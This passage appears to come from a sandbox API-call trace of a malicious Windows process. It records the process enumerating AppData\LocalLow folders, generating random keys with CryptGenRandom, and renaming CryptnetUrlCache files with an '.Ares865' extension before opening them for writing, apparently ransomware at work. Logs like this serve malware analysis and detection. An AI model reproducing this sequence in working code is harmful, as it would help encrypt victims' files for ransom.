phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0109.725] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.725] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0109.729] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09" [0109.731] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB" [0109.733] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME" [0109.735] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T" [0109.736] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0" [0109.740] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1" [0109.741] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12" [0109.743] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12" [0109.746] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache" [0109.747] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData" [0109.748] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.Ares865") returned 156 [0109.748] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.ares865"), dwFlags=0x1) returned 1 [0109.755] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.756] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=400) returned 1 [0109.756] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.756] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.756] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.756] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.760] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.760] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.784] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.785] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.785] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.785] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.Ares865") returned 156 [0109.785] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875.ares865"), dwFlags=0x1) returned 1 [0109.788] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.788] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=358) returned 1 [0109.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.788] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.789] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.789] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.794] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.795] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.795] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.795] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.Ares865") returned 156 [0109.795] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973.ares865"), dwFlags=0x1) returned 1 [0109.797] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.797] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=404) returned 1 [0109.797] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.797] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.797] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.797] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.798] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.798] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.802] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.803] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.803] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.804] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406.Ares865") returned 123 [0109.804] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406.ares865"), dwFlags=0x1) returned 1 [0109.805] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.805] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=268) returned 1 [0109.805] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.806] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.806] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.806] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.811] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.812] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.812] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.812] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D.Ares865") returned 123 [0109.812] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d.ares865"), dwFlags=0x1) returned 1 [0109.814] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.814] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=292) returned 1 [0109.815] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.815] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.815] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.815] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.815] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.815] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.819] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.819] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.819] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.820] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D.Ares865") returned 123 [0109.820] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d.ares865"), dwFlags=0x1) returned 1 [0109.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.821] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=220) returned 1 [0109.821] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.822] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.822] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.822] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.822] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.822] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.829] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.832] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.832] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.833] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.Ares865") returned 156 [0109.833] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d.ares865"), dwFlags=0x1) returned 1 [0109.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.835] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=394) returned 1 [0109.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.835] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.836] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.836] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.838] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.839] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.839] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.839] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.Ares865") returned 156 [0109.840] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.ares865"), dwFlags=0x1) returned 1 [0109.841] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.841] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=400) returned 1 [0109.841] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.841] RtlAllocateHeap 